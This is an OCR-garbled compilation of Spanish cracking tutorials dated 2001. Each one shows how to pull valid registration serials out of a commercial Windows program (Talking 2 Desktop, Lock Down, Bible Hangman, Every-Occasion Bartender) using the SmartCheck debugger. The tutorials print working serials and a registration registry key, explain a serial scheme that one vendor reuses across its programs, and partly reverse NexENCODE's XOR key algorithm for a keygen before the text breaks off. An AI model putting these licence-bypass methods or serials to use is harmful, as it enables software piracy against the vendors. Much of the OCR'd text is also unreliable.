cap_kirk69owhotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Talking 2 Desktop v 1.0 


Name/serial 


Buscar un Numero de serie valido 


Principiante 


http://www.4developers.com/ 


smartcheck 6x 


Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como en 
contrar un serial valido para el Talking 2 Desktop v 1.0 de la empresa 4developers que se 
especializa en desarrollar utilerias para windows algunas muy buenas y esta es una de 
ellaS........ como podran ver aumente una nueva seccion que se llama : VALORACION 
DEL SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de 
vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


Esta es una utileria que promete ser una buena utileria de reconocimiento de voz, para poder ejecutar todos tus programas 
con solo hablar.... la verdad me gusto el Talking 2 Desktop v 1.0 ya quetiene muy buenas opciones...... 


Objetivos 

Buscar un Numero de Serie 

Manos a la Obra 

Bueno amigos empezemos con este Taco de Tripa de Lechel !!!! J EJ EJ EJ E)..... lo primero que haremos es analizar el 


programa para ver si esta empakado y en que lenguaje fue hecho, con la herramienta llamada Lenguaje 2000 y nos 
mostrara esto: 


VArchivos de programaWT alk2DMalk2desk exe 


mmmm.... esta hecho en visual Basic v 6.0 y no esta empacado ni nada de nada...jejeje.... continuemos...... ahora 
abramos el programa y nos aparecera una ventana como esta: 


la que nos dice que es una version Trial y que tenemos 14 dias para probarlo, insertamos un nombre y numero de serie y 
damos click en UNLOCK y nos manda el siguiente mensaje: 


UNREGISTERED User 


X 


OK! como vimos esta hecho en visual basic v 6.0, se me antoja ahora usar el Smartcheck v 6.03, ( por cierto un saludo a 
Kuato Thor) ok vamos y abrimos el Talking 2 Desktop v 1.0 en el Smart Check, una vez abierto vamos y configuramos el 
Smart Check para que este bien carburadito y nos muestre la informacion que buscamos....... para mayor referencia de 
como configurarlo lean mi tuto sobre la configuracion basica del smartcheck...... 


En Busca del Serial 


bueno amigos ahora empezemos a buscar el serial del programita ... vamos y ejecutamos el SmartCheck y despues damos 


click en el boton de ejección al y se ejecutara el Talking2Desktop, insertamos nuestro nombre y numero de serie falso y 
damos click en UNLOCK y nos aparecera el mensaje de error damos click en OK y nos vamos inmediatamente a el 


SmartCheck y paramos la ejecucion del programa dando click en MO ahora empesaremos a buscar el serial, damos click 


en Show All Events R***, para que nos muestre todo los eventos que ocurrieron en la ejecucion del Talking2desktop, 


Y talk2desk exe - Program Results 


ahora vamos y escribimos las primeros 4 numeros de nuestro serial falso introducido en la seccion de busqueda del 
SmartCheck 


y damos click en el icono de busqueda y despues de unos cuantos clickz encontramos lo siguiente : 


WD talk2desk exe Program Results 


$  _vbaieVa(VARIANT Integer 1] retuens DWORD:20 
9% Ler(Sting'"01234557.. -'retuara LONGM1 
(0 9% Mid$iSting""01234567...”. long:2, VARIANT:Integer 1) 
—vbaStMove(String""1”, LPBSTA:0068E810) retums DWORD: - 
—baStiCalíSting"1", String""5984-036..."] rebums DWORD:47 
—vbaStiMove(Sting:"5884-035...”, LPBSTR:0068£ 820) retums 
A O j 


o 4.PLEOPBGOS 
oo 


que a mi punto de vista parece un numero de serie..... jejejje] ...... mmmm apuntemoslo ese numerito y abramos ahora 


el talk2desktop e insertamos esos numeritos ... yyyyyy !!!!!!!..... jejejejejej nos aparece esta ventana : 


REGISTERED User 


O 


ahora si podemos decir ....... PROGRAMA CRACKEADO ....... ESPERO QUE ESTOS DE 4 DEVELOPERS, MEJ OREN LA 
PROTECCION YA QUE ES UN PROGRAMA QUE TIENE MUCHAS COSAS BUENAS, LO UNICO MALO ES LA PROTECCION Y EL 
LENGUAJE EN QUE FUE HECHO VISUAL BASIC V 6.00 HUACALA DE POLLO. .... 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
e [DeK_OiN ] 
e Act MAgO 
. ¡TeD 
+ SIRDREAM 
+. POTHEAD 


e. VluGo 


e CrKViz 

e Txeli 

e Kuato_Thor 
e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Lock Down v 1.1 


Name / Serial 


Buscar un serial valido 


Principiante 


http://www.demsoftware.bizland.com/ 
SmartCheck 6.x 
Profesor_X FECHA: 15/04/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de 
serie valido para el Lock Down 1.1 de la empresa DCM Software que se especializa en desarrollar 
utilerias para windows ........ como podran ver aumente una nueva seccion que se 
llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se 
merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e alguna vez has deseado poder encryptar tus archivos para que ninguna persona no deseada no los pueda ver .... 
bueno pues esta es la utileria idonea para hacer eso... Lock Down encrypta cualquier archivo usando una clave 
alphanumerica o numerica y puedes usar esa misma clave para desencryptarlos asi de facil... .segun en la ayuda 
dice que nadie podra desencriptar esa clave.....jejejjeje.....ya veremos si es cierto....... 


Objetivos 
1. Buscar un Numero de serie valido 


Manos a la Obra 


Bueno amigos empezemos con este CALDO DE OLLA !!!! J EJ EJ EJ E) ..... lo primero que haremos es analizar el programa 
para ver si esta empakado y en que lenguaje fue hecho, lo analizaremos con la herramienta llamada Lenguaje 2000 y nos 
mostrara esto: 


é CWProgram Files WM ockDowniLockdown. exo 


mmmm....como podemos ver esta hecho en visual Basic y no esta empacado ni nada de nada...jejeje.... continuemos...... 
ahora abramos el programa y nos aparecera una ventana como esta: 


NL SOGUWARE 


This is a demo version of Lock Down. You have a 
15 try, trial period. You are currently 

using try 2 

Dat 


la que nos dice que es una version demo y que tenemos 15 veces para probarlo, damos click en NEXT y nos manda a la 
siguiente ventana: 


aparece esta ventana en la cual otra vez nos manda el mensaje de que nos registremos...jejejje... a como molestan con 
esas ventanitas....jejejje.. ok ahora damos en START y nos manda a la ventana del programa, una vez ahi damos click en 
el menu OPTIONS > REGISTER y nos manda a la siguiente ventana en la cual insertaremos un nombre y numero de serie para 
ver si le atinamos a registrarnos : 


Bible Hangman - Registration 


ET 
123456789 — | 


ok! ahora damos click en UNLOCK y nos mada el siguiente mensaje: 


Lock Down 


XK 


ok! ahora vamos y abrimos el Smart Check, vamos al menu FILE >OPEN y seleccionamos el ejecutable del Lock Down y 
despues damos click en el boton de ejecución del programa > y empieza el MEREQUETENGUE .... apareceran las 
ventanas antes mencionadas del programa e insertamos un name y serial damos click y despues de que nos manda el 
mensaje de error de REGISTRATION WAS NOT....BLA BLA..BLA... vamos y damos click en el boton de terminacion de 


ejecucion del Lock Down en el Smart Check MO y nos aparecera la siguiente informacion : 


NuMega SmartCheck - [Lockdown. exe - Program Results] 


como podemos ver nos aparecen varios eventos ejecutados por el Lock Down pero nos centraremos en buscar en la sección 
llamada COMAND1_CLICK damos click en el signo de + y nos abre todos los eventos que se realizaron en esa sección : 


Ñ Lockdown,exe - Program Results 


mmmmm.... como podemos ver al dar click en LTRIM$ nos muestra nuestro nombre.... y si damos click en el LTRIM$ que 
esta 2 lineas abajo y nos aparece nuestro numero falso... mmmm... creo que ahi la llevamos. ..sigamos buscando ........ 
vamos dando click en todos los eventos hacia abajo y vamos viendo que nos aparecen diferentes operaciones que realiza 
con el nombre y numero de serie falso... hasta que llegamos a esta parte : 


3 Lockdown.exe - Program Results 


y el la linea que sigue abajo si damos click nos muestra el String que manda en el mensaje de error.....mmmmmm.... 
OK!!! ahora apuntemos ese numero extraño F711-E463-5730-BAB3 ...cerremos el Smart Check y abrimos el Lock 


Down e insertamos nuestro nombre tal y como lo pusimos anteriormente e insertamos ese numero extraño 
JU 


Lock Down 


jejejejjejejjeje.... CREO QUE ESTE MENJURGUE ESTA LISTO....... 


ESTE ARROZ YA SE COCIO......... 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e [DeK_OiN] 


e Act MAgO 
e. ¡TeD 

e SIR DREAM 
e POTHEAD 
e VluGo 

e CrKViz 

e Txeli 

e Kuato_Thor 
+ CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/ karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Karpoff Spanish Tutor 2001 


Programa: Bible hangman v 3.0 build 10001 

PROTECCION: Name / Serial 

Objetivo: Sacar un serial valido 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD : http://www.demsoftware.bizland.com/ 

Herramientas: SmartCheck v6x 

CRACKER: Profesor_X FECHA: 15/04/2001 
INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como 
encontrar un numero de serie valido para el Bible hangman v 3.0 build 10001 de la 
empresa DCM Software que se especializa en desarrollar utilerias para windows ........ 
como podran ver aumente una nueva seccion que se llama : VALORACION DEL 
SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de vista, 
tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Ahora la empresa DCM Software saca un juego clasico del ahorcado, esta bueno para quien quiera perder un poco 
de tiempo jugando, que dejenme decirles que a mi en especial no me gustan los juegos, el por que no me lo 
pregunten. .... pero para quien le gusten juegenlo y quedaran satifechos ..... :) 


Objetivos 
1. Buscar un Numero de serie valido 


Manos a la Obra 


Bueno amigos empezemos con este TACO DE TRIPA DE LECHE!!!! J EJ EJ EJ E) ..... lo primero que haremos es analizar el 
programa para ver si esta empakado y en que lenguaje fue hecho, lo analizaremos con la herramienta llamada Lenguaje 
2000 y nos mostrara esto: 


é CWProgram Files Bible Hangman 3.0 Vbibleh30. exe 


Bible Vord Came For Windows 


Hanguan 


AN 
A 
Microsoft Corporation 


mmmm....como podemos ver esta hecho en visual Basic y no esta empacado ni nada de nada.. .jejeje.... continuemos...... 
ahora abramos el programa y nos aparecera una ventana como esta: 


LONA SOUTDWARE 


la que nos dice que es una version demo y que tenemos 15 veces para probarlo, damos click en NEXT y nos manda a la 


siguiente ventana en la cual daremos START y caemos en esta ventana: 


Bible Hangman For Windows Ver. 3.0 


. 


una vez ahi damos click en el menu OPTIONS > REGISTER y nos manda a la siguiente ventana en la cual insertaremos un 
nombre y numero de serie para registranos...jejejejje....: 


ok! ahora damos click en UNLOCK y nos mada el siguiente mensaje: 


¡Bible Hangman 


X 


ok! ahora vamos y abrimos el Smart Check,vamos al menu FILE >OPEN y seleccionamos el ejecutable del Bible 
hangman v 3.0 build 10001 y despues damos click en el boton de ejecución del programa Ma empieza el 
DANZON.... apareceran las ventanas antes mencionadas del programa e insertamos un name y serial damos click y despues 
de que nos manda el mensaje de error de REGISTRATION WAS NOT....BLA BLA..BLA... vamos y damos click en el boton de 


terminacion de ejecucion del Bible hangman v 3.0 build 10001 en el Smart Check nu y nos aparecera la siguiente 
informacion : 


3 bibleh30 exe - Program Results 


como podemos ver nos aparecen varios eventos ejecutados por el Bible hangman v 3.0 build 10001 pero nos 
centraremos en buscar en la sección llamada COMAND1_CLICK damos click en el signo de + y nos abre todos los eventos que 
se realizaron en esa sección : 


l Y bibleh30.exe - Program Results 


8 


ol 


aa 


mmmmm.... como podemos ver al dar click en LTRIM$ nos muestra nuestro nombre. ... y si damos click en el LTRIM$ que 
esta 2 lineas abajo y nos aparece nuestro numero falso...mmmm... creo que ahi la llevamos...sigamos buscando ........ 
vamos dando click en todos los eventos hacia abajo y vamos viendo que nos aparecen diferentes operaciones que realiza 
con el nombre y numero de serie falso... hasta que llegamos a esta parte donde nos muestra otra vez nuestro numero de 
serie falso y una linea mas abajo damos click y nos muestra estos numeros: 


WD bibleh30.exe - Program Results 


y el la linea que sigue abajo si damos click nos muestra el String que manda en el mensaje de error.....mmmmmm.... OK!!! 
ahora apuntemos ese numero extraño 4M7NUDSKBG324564 ...cerremos el Smart Check y abrimos el Bible hangman v 3.0 
build 10001 e insertamos nuestro nombre tal y como lo pusimos anteriormente e insertamos ese numero extraño 

y coc. 


Bible Hangman 


jejejejjejejjeje.... CREO QUE ESTE TACO YA ESTA LISTO....... 
el serial se guarda en el registro de windows en esta seccion: 


[HKEY_CURRENT_USERISoftwarelVB and VBA Program SettingsBible HangmaniInstall] 
"Registered User"="profesor x" 

"Installation Date"="0<345./ 4" 

"Nr of Times operated"="/ " 

"Registration Number"="3P;RXCRNFK6138:8" 


si borran esa linea, quedaran sin registrar otra vez........ 


nOTAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
+ [DeK_O0iN ] 
e. Act MAgO 
. ¡TeD 
e SIR DREAM 
e POTHEAD 
e VluGo 
e CrKViz 
e Txeli 
e Kuato_Thor 
+ CODE_MEX 
e Metamorfer 
e Txotxo 
e Raziel 
e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 


muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Karpoff Spanish Tutor 2001 
ELLOS IMA: Every-Occasion Bartender V1.01 


PROTECCION: Serial 

Objetivo: Buscar Un serial Valido 
Descripcion: 

Dificultad: Principiante 

DOWNLOAD : http://www.softcircuits.com/rodent/ 


e Filelnspector 
Herramientas: e Numega Smartcheck 6 


CRACKER: SiLvEr StOrM FECHA: 15/04/2001 


INTRODUCCION 


JejeJe, de nuevo yo por aqui..seguimos contando este es el tutorial numero 6 que hago.. a todos Uds..., espero 


que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines netamente educativos 
si les interesa este Programa COMPRENLO. 


AL ATAKErr 


Comentario del Programa 


e El programa que elegimos es un Programita que tiene un monton de recetas de como preparar cocktails (bebidas).. pero no solo sirve 
para este programa, sino para todos los programas que esta casa de software hizo,,, Jeejeee jee 


Objetivos 
1. Buscar un serial Valido 
Manos a la Obra 


Primero instalaremos nuestro programa: 
Lo inspeccionamos con fileinspector (vemos que esta hecho con visualbisic 5). 


Luego se me ocurrio la idea de usar NUMEGA SMARTCHECK 6.2. (este es mi primer manual usando esta herramienta.) 


A BusKar El Zeryal 


Ok.. 


Lo primero que hacemos es cargar el programa SMARTCHECK y desde ahi, ejecutamos el programa (file-->open-->archivo) buscamos el 
archivo bartendr.exe 


Luego presionamos ES (Program --> start) 
Esperamos----- 

Esperamos---- 

Seguimos Esperando-- 

Que lenta es mi maquina.. creo que necesito una nueva... 


Cuando ejecuto el programa y lo intento registrar (HELP--> Register....) me sale algo como esto: 


Every-Dccasion Bartender - Bartendr.bar 


MI 
_— 


Program Registration 


Ok. Ponemos los datos que este programita nos pide... Jeje (esos son mis datos... Prueben Uds. con su propio nombre) 
y Presionamos REGISTER 


que les parece? nos manda ese mensaje de error ... 


Program Registration 


Le damos ACEPTAR y Swichamos (vamos) a la pantalla de SmartCheck 


Presionamos VIEW ---> Expand all y nos vamos al final del trace 


ps NuMega SmartCheck - [Bartendr.exe A SES 


E 
EaaAai 7] HR elas A lala 
2  Long([7)--> String (''7"'] 


Mid$ E String str = 00442E 78 
¿Asc retums Integer: 79 o =""8001041747" 


o A | Long length = 3 0x00000003 
$% Asc retums Integer: 76 
2 Long(4)--> String [''4"'] 
$% Mid$ 
$% Asc retums Integer:82 
Len returns LONG:14 
Mid$ 
$% Asc retums Integer:85 
Long (7) --> String [''?"*] 
Mid$ 
Mid$ 


No source file 


Esto parece un serial.--- VERDAD?... 

Ok.. probe pero no funciono... (les Explico) 

ese serial se forma de la siguiente forma: son 10 numeros. 01234567 8 9 (8001041747) 

Tomamos los digitos 345 ponemos un - lugo tomamos los cuatro numeros siguientes 6789 ponemos - y por ultimo los tres primeros 012 
Ordenado quedaría así: 345-6789-012 en mí caso (104-1747-800) 

Espero entiendan .. es facilito.. 


Probamos con lo que conseguimos.... 


Program Registration 


O 


Jeje ... Otro MASs... o mejor dicho otro Menos... o quizas Otro... Quien sabe....No lo se.. 


nO0TAS 


Este mismo esquema lo usan todos los programas de esta casa de software asi que pueden practicar con todos ellos. 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


e Profesor_x 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_ 2001 Ehotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


PROTECCION: Name / Serial 

Bonito paquete de funciones para los MP3, aunque bastante mal 
Descripcion: ; : 

2 NN, y con una (des)proteccion de risa 
DOWNLOAD: nc O si ODO 


SmartCheck 6.03 + APIS32 2.5 (+ Visual Basic para el KeyGen, 
opcional) 


Herramientas: 


INTRODUCCION 


Las pocas experiencias que he tenido con el Visual Basic (des del punto de vista del cracker) han sido muy 
productivas. Los programadores (mas basicos que visuales) tienen la imaginacion de una cebolla, aunque a la 
hora de inventarse un algoritmo les salen las paranoias mas paranoicas. El fruto de mis investigaciones es 
este: 


- Las funciones Xor y Hex son muy usadas, ya que son reversibles y les hace gracia a los programadores. 
Tambien usan mucho cambinaciones raras de letras (les gusta mucho el ASCII) y numeros. 


- A menos que el programador haya leído este tutorial, lo que hacen es crear una llave y compararla con un 
dato que hayas introducido, con lo que solo revisando el codigo y pensando un poco, se puede sacar el SN. 


AL ATAKE 


Antes de todo, quiero avisar que no sirve de nada petar este programa, ya que por si solo es gratis... Esto encarna el 
espiritu de un autentico Reverse Engineer! 


Midiendo Fuerzas 


Si por casualidad descubres que boton abra la ventana de opciones (una ayuda: es el azul gordo de la parte inferior 
izquierda de la "ventana principal”), veras que hay la opcion Register. Seleccionandola, nos aparece el tipico cuadro 
donde puedes introducir el nombre y un SN (en este caso pone Password). Puedes comprovar que, poniendo cualquier 
cosa (en mi caso "zerU" y "147258369" te avisa de que lo has hecho muy, pero que muy mal. Pero aun no sabe que 
solo estabamos recogiendo pistas. 


Abriendole las entrañas 


Es la hora del SmartCheck! Este fabuloso ingenio de la nunca decepcionante casa NuMega. Una vez lo hayas cargado, 
le das al Open (menu File) y eliges a nuestro amigo (NexENCODE.exe). Luego, le das al Start (en el menu Program) y 
puedes ver como el "objeto en cuestion" va cargando librerias (DLLs) y controles (OCXs). Estos ultimos los puedes 
usar tu mismo en tus programas. Por ejemplo, el MP3ENC.ocx esta claro que sirve para codificar MP3, y el 
MP3PLAY.ocx te puede servir para reproducirlos. Pero, volviendo al tema, podemos ver como, si ya habias 
introducido un nombre y un password antes, te recuerda que LO HAS HECHO MAL! Si te lo recuerda, es que se habia 
guardado los datos, y como es poco probable que guarde en algun lugar la opcion "EstoyRegistrado = FALSO", sera 
que vuelve a cargar los datos y los comprueva (si has llegado hasta aqui y me has entendido, no necesitas este tutorial ;- 
) ). En el caso contrario (si no te avisa de nada sobre el password), tienes que volver a ir a opciones, register, ... 


Una vez hayas hecho alguna de las dos cosas, cierra el programa (para que no entre el viento, ja ja) para que el 
SmartCheck (a partir de ahora SM, que me canso de escribir) acabe su informe. Y cuando esto haya pasado, te 
recomiendo que filtres el resultado, de la siguiente manera: eliges la opcion Specific events (menu View) y solo dejas 
marcadas las opciones 2, 3 y 4 de la lista. Asi el SM nos enseñara solamente lo que nos interesa. Una vez filtrado, le 
das al Find (menu Edit) y pones "Msgbox" (si sabes algo de Visual Basic, sabras que es la funcion que se encarga de 
mostrar mensajitos pesaos). Le das al Find Next hasta que aterrizes en un Msgbox en el que ponga "NexENCODE 
studio colud not register... bla bla bla" (el que nos habia mostrado antes). 


Ahora, si el nombre que habias puesto tenia 5 o menos caracteres, sigue leyendo. Si tenia 6 o mas, adelanta hasta el 
capitulo 1-0 (esto parece el MonoPoly). 


Buscando el tamaño adecuado 


Encima del Msgbox puedes ver como hay la instruccion Len. Esta se encarga de medir cadenas de texto. En mi caso, 
como habia puesto "zerU", la instruccion habia devuelto como resultado 4 (puedes ver tu resultado). Bien, como no hay 
ningun tipo de comprovacion excepto este, sera que el programa primero comprueva el tamaño del nombre, y si no le 
gusta directamente te muestra el mensaje de error. Como no pasamos ni de la primera comprovacion, no podemos ver 
las otras... asi que tendremos que "adivinar" el tamaño que quiere este pesao. 


Esto lo vamos a hacer con el APIS 32, un invento que se encarga de registrar las APIS que usa un programa. Mas 
adelante veras porque. Bien, abrimos el APIS (por ahi corre un tutorial sobre como petarlo), en el cuadro "Examining 
Application” seleccionamos a nuestro objetivo y le das al "Imports", para cargar la funcion del programa que se 
encarga de medir el tamaño de una cadena de texto: vbaLenBstr . Ahora le das al Run, en la ventana que aparece eliges 
la libreria MSVBM60.DLL (la que usan los programas Visual Basic 6.0) y luego le das al pause, porque de momento 
no nos interesa lo que hace el programa. 


Una vez el programa este cargado, abres (otra vez) la ventana de opciones, vas al Register y desmarcas el boton Pause 
del APIS. Le das al boton "Register" del NexENCODE y en el APIS aparecera una referencia a la fucnion vbaLenBstr 
(que devuelve, en mi caso, 4), pero que simplemente no hace nada mas (como no habia pasado antes!). Pues bien, 
añadimos un caracter (yo puse "zerU*") y volvemos a darle al Register. Ahora, como es logico, la funcion vuelve a 
aparecer y devuelve 5, pero continua sin hacer nada mas! A la tecrera va la vencida, o sea que añadimos otro caracter 
(ahora ya tengo "zerU**") y le damos (por enesima vez) al Register. UN MOMENTO! Ahora, ademas de registrar el 
vbaLenBstr, salen mogollon de funciones mas! Por fin, hemos dado con el tamaño adecuado, que seguramente es 6 o 
mas grande. Ahora simplemente tienes que volver a registrar los movimientos del amigo Nex con el SmartCheck, pero 


con un nombre un poco largo (6 o mas caracteres) y volver a buscar la funcion Msgbox que nos dio la pista. 


1-0 


Esta vez podras comprovar que encima de la Msgbox estan las instrucciones que realizan los calculos para generar el 


password: 
Resultado en el SmartCheck Traduccion al cristiano 
$9“ Len(String:""zerU**""] returns LONG:6 Devuelve el tamaño de nuestro nombre (zerU**) 
$9 LeníString:""pickles""] returns LONG:7? Devuelve el tamaño de la llave que usa para hacer el password (pickles) 
9% MidstíSting:"pickles", long:1, VARIANT:Integer:1) Coge el primer caracter de "pickles", o sea, "p" 
9% Asc[String:"'p')] returns Integer:112 Saca el valor ASCII de ese caracter (p), que es 112 
R2 Integer (112) --> String ("112") Lo convierte a numero, ya que lo tenia en forma de texto 


$% MidtíSting:"pickles", lona:2, VARIANT:Integer:1) Coge el segundo caracter de "pickles", o sea, "i" 
$“ Asc[(String:"""] retums Integer: 105 Saca el valor ASCII de ese caracter (i), que es 105 
RP Integer (105) --> String ("105") Lo convierte a numero, ya que lo tenia en forma de texto 
$% Mid$íSting:"pickles", long:3, VARIANT:Integer:1) Coge el tercer caracter de "pickles", o sea, "c" 

$9 Asc[String:""c")] returns Integer: 99 Saca el valor ASCII de ese caracter (c), que es 99 
2 Integer (99) --> String ("'99'"] Lo convierte a numero, ya que lo tenia en forma de texto 
9% MidtíSting:"pickles", long:4, VARIANT:Integer:1] Coge el cuarto caracter de "pickles", o sea, "k" 
9% Asc[String:"'k'"'] returns Integer: 107 Saca el valor ASCII de ese caracter (k), que es 107 
RP Integer (107) --> String ('"107"")] Lo convierte a numero, ya que lo tenia en forma de texto 
$% MidsíSting:"pickles", long:5, VARIANT:Integer:1) Coge el quinto caracter de "pickles", o sea, "1" 
9% Asc[String:*") retums Integer: 108 Saca el valor ASCII de ese caracter (1), que es 108 
2 Integer (108) --> String ['108"'] Lo convierte a numero, ya que lo tenia en forma de texto 
$% MidtíSting:"pickles", lona:6, VARIANT: Integer: 1) Coge el sexto caracter de "pickles", o sea, "e" 

9% Asc[String:"e")] returns Integer:101 Saca el valor ASCII de ese caracter (e), que es 101 
P2 Integer (101) --> String (''101") Lo convierte a numero, ya que lo tenia en forma de texto 
9% Mid$[String:"pickles", long:7, VARIANT:Integer:1) Coge el septimo caracter de "pickles", o sea, "s” 
$9 Asc[String:*'s"*) retums Integer:115 Saca el valor ASCII de ese caracter (s), que es 115 
RP Integer (115) --> String ("115") Lo convierte a numero, ya que lo tenia en forma de texto 
9% LeníString:'"14725836...”)] retums LONG:9 Devuelve el tamaño del SN que hemos puesto (147258369) 


Pues este rollazo solo era para crear un peazo numero juntando todos los valores ASCU que ha sacado antes (resaltados 
en blanco), o sea, que da como resultado 11210599107108101115 no esta mal, eh? (a partir de ahora me referire a este 
numero como "llave rara", 0k?). Luego, empieza a hacer cosas raras de verdad. Esta vez abreviando: 


Traduccion al cristiano 
1. Saca el primer caracter del la llave rara (1) 
2. Le saca el valor ASCII ("1" => 49) 


Resultado en el SmartCheck 
$% Mid$íSting:"11210599...", long:1, VARIANT:Integer:1) 
$% AscíString:"1") returns Integer:49 
$% LeníString:""11210599..."] retums LONG:20 3. Devuelve el tamaño de la llave rara (20) 
$% MidsíSting:""14725836...", long:1, VARIANT:Integer:2] 4. Saca el primer caracter de nuestro SN (1) 
9% ValíSting:"H14") retums double:20 [displayed as single-precision floating point] 5. Esto es un poco largo de contar* 

2. Double (20) --> Long (20) 6. Lo pasa de texto a numero 
$% Chr$llnteger:37) 7. Lo convierte en caracter (usando ASCII) 


* El valor que habia sacado de nuestro SN lo trata como si estuviese en Hexadecimal y lo pasa a Decimal. O sea, que convierte un numero 
decimal a decimal (poco tonto, no? :0) ) 


Y esto lo hace con todos los caracteres del SN (con el primero del SN y el primero de la llave rara, luego con los dos 
segundos, etc.). 


Y si te fijas un poco (FIJATE!), veras que en el 6” paso tiene un 20 y que, en el 7”, tiene un 37... de donde ha salido el 
misterioso 37? Pues, como he dicho en la introduccion, simplemente de un XOR con el numero 49 (49 XOR 20 = 37). 
Este 49 es el valor ASCII del numero que hemos sacado de la llave rara (1 y 2 pasos). 


Y todo esto para que? Pues, fijandote en la linea que resaltado en blanco (la 7), ahi esta el resultado de la operacion. 
Por ejemplo, una vez le ha salido el numero 37, lo pasa a caracter (en ASCIH es el "%"). Asi, usando nuestro SN, al 
programa le ha salido la serie numerica 37, 67, 106, 7 y 57, que en formato de caracteres seria algo asi como "%Cj 9". 
No hace falta ser un hacker para ver que este churro y nuestro nombre ("zerU**") no son iguales. Y dices, ahora que 


hago? Le pongo ese mismo el mismo SN y como nombre el churro? Es una solucion, pero a mi me gusta dejar la firma. 
Lo basico sobre Visual Basic 


A menos que hayas experimentado en propia carne los problemitas que acarrea el Visual Basic, te voy a explicar un 
poco todas las complicaciones del codigo: 


- Para que sirve pasar de "texto" a "numero"? Pues bien, la maquina no es muy lista, y no le puedes pedir que divida 
una A entre una B. Lo mismo con numeros, que aunque tu los veas como numeros, no es lo mismo un 1 (valor 1 en 
decimal) que un "1" (caracter numero 49 en el ASCII). Asic, el "1" lo pasamos a 1 para poder hacer esto: 1 + 1=2. 


- Ahora un pequeño resumen de las funcions de Visual Basic: Len devuelve el tamaño de una cadena, de la siguiente 
manera: "TamañoDeLaCadena = Len (Cadena)"; Mid devuelve un pedazo de un texto, de la siguiente manera: 
"PedazoDeTextoDevuelo = Mid (Texto, InicioDelPedazo, LongitudDelPedazo)"; Ase y Chr sirven para relacionar 
valores ASCII con sus correspondientes caracteres: el primero devuelve el valor ASCII de un caracter de la siguiente 
manera: "ValorASCH = Asc (Caracter)", y el segundo al reves, o sea, que con un valor ASCII devuelve el caracter que 
